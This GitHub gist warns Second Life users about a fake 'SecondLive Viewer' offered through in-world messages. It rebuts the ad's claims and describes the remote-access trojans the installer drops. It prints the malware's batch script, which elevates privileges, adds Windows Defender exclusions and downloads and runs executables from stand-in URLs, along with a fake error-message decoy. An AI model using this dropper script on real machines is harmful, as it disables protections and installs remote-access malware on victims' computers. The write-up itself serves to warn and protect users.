Skip to content

Instantly share code, notes, and snippets.

@FelixWolf

FelixWolf/secondliveviewerscam.md

Last active November 24, 2023 18:55
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save FelixWolf/ddea8e96b8195181098d8d4e7c4273c4 to your computer and use it in GitHub Desktop.
Save FelixWolf/ddea8e96b8195181098d8d4e7c4273c4 to your computer and use it in GitHub Desktop.
Download ZIP
Second Live Viewer Scam
Raw
secondliveviewerscam.md

Whats the scam?

This scam often starts as a instant message from someone in Second Life that looks like the following:

Hello,

Are you tired of spending your hard-earned Linden Dollars? We've got an exciting solution just for you! Introducing our SecondLive Viewer, where everything is not only free but also open for endless possibilities.

  • Unlock unlimited Linden Dollars (L$) for all your virtual adventures.
  • Fly to unlimited heights.
  • Build on any land of your choice, all for free.

But that's just the beginning.

Link: <Some URL, typically a tinyurl link>

We're sincerely thankful to everyone who joins us in our mission to make SecondLife completely free. Don't miss this incredible opportunity.

Best Regards.

Let's take a look at it's claims..

  • Unlock unlimited Linden Dollars (L$) for all your virtual adventures.

This isn't possible. L$ isn't stored on the client. It is stored on the server that LL controls. You would need access to Linden Lab's servers, in which case:

  1. This is fraud, which is a crime. Generating L$ is not legal, and is a violation of both the Terms of Service and federal law.
  2. This is violation of the Computer Fraud and Abuse Act, which covers unauthorized access to computers. (Servers count as computers!)
  3. Linden Lab would know instantly. They have systems in place to track if anyone logs into their servers in a unauthorized manner. They also have systems in place to detect fraudulent transactions.
  4. Linden Lab will track the money. No matter how many times you "launder" it, the money is tracked.

Simply put, there is no way to get free L$ other than the currently available methods in SL such as money trees and games.

  • Fly to unlimited heights.

This isn't anything new. Most third party viewers already allow you to fly to unlimited heights. LL even removed the flight limit.

If you are using firestorm:

  1. Paste this link in chat secondlife:///app/openfloater/preferences?search=Enable%20usage%20of%20chat%20bar%20as%20a%20command%20line and give it a click
  2. Enable "Enable use of chat bar as a command line"
  3. Type this in chat: gth 50000
  4. Observe you are now 50000 meters in the air!

You can find out what each of these commands do here: https://wiki.firestormviewer.org/preferences_chat_tab#cmdline_tab

  • Build on any land of your choice, all for free.

This isn't possible. Land permissions are checked by the simulator, not the viewer. While it is possible to edit your avatar on any land, it isn't possible to create or rez objects on any land. In some cases, it may be possible to bring objects into no-build land, such as with scripted vehicles driving onto it, this is technically a feature.

So what does it actually do?

A lot of stuff you don't want happening. I'll break it down into steps:

  1. You are instructed to download viewer.exe, upon execution it will pretend to install a viewer so that it looks legitiment.
  2. Upon running the newly installed program, it will run builddata.bat, which looks like this:
net session>nul 2>&1
if %errorlevel%==0 goto main
echo CreateObject("Shell.Application").ShellExecute "%~f0", "", "", "runas">"%temp%/elevate.vbs"
"%temp%/elevate.vbs"
del "%temp%/elevate.vbs"
exit

:main
powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://example.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://example.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://example.com/A -OutFile A.exe;./A.exe;exit

This script elevates the permission to administrator permissions ON YOUR COMPUTER! This is incredibly dangerous as it allows whatever is running to do what it wants. In specific, this script will download a file called "V1", "Q", and "A"

  1. The script will execute "V1", which installs "1" and "2".
  2. "1" will install Trojan.CobaltStrike, which is a penetration testing toolkit which cybercriminals often abuse in order to do remote administrative access.
  3. "2" will install Trojan.Molotov/Reflo. While I am not 100% sure about what it does, it is very likely another remote administration toolkit.
  4. "Q" will install Quasar, which is also a remote administration toolkit.
  5. "A" will install AsyncRAT which is also a remote administrative toolkit.
  6. Some of the tools will automatically install additional stuff not included in the script, such as a cryptominer.
  7. The script will execute start.vbs

Start.vbs just shows a fake dialog saying that there was an error:

x=msgbox ("The OpenGL driver detected a problem with the display driver and is unable to continue. The application must close. Error code:3",0+64,"Error")

Why so many remote administrative toolkits?

Attackers will intentionally install as many backdoors as possible so that it becomes increasingly difficult to remove, to the point where you should probably just wipe your hard drive and re-install your operating system.

Is that it? Does it install anything else?

Yes and no:

  • No: The script it's self doesn't install anything else
  • Yes: However, when each of the remote administrative toolkits are installed, it pings as server, which that server can tell the toolkit to install even more stuff.

While I could do further investigation, it involves going further than I feel reasonably safe doing so.

What does a remote administrative toolkit do?

A remote administrative toolkit(also known as a RAT), is basically like giving someone physical access to your computer. They can, but no limited to, do the following:

  • Steal your username / passwords
  • Steal your browser cookies
  • Steal your files
  • Steal your banking information
  • Steal your L$
  • Steal your REAL WORLD money (through credit / banking / wire fraud)
  • View your webcam and take pictures/videos
  • View your desktop
  • Install additional software
  • Encrypt your files
  • Delete your files

What does a cryptominer do?

A cryptominer abuses your GPU to mine cryptocurrency such as bitcoin. This wastes electricity, computing power, and also degrades your graphics card. And you do not see a dime of what they make. It's basically turning your computer into a mining slave.

Help! I installed it! What do I do?

  1. Turn the computer that you installed it on OFF immediately! If the computer is off, they can't access it. Make sure you do not put it in a "sleep" state where the CPU is still operating in a lower power mode, make sure it is OFF off!
  2. Take your device to a computer technician who is specialized in removing viruses and malware. Be prepared to have to have your files backed up and system re-installed.
  3. Do not be tempted to use it until it is cleaned! Malware can spread over internal networks, and every moment it is on is a chance that the hacker will be able to steal any or more data from you!

Virustotal scans:

@sldevel
Copy link

sldevel commented Nov 3, 2023

The one and only official site to download the Cool VL Viewer binaries and sources is http://sldev.free.fr/
Anyone being offered my viewer by any third party should never accept it and immediately report to me.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment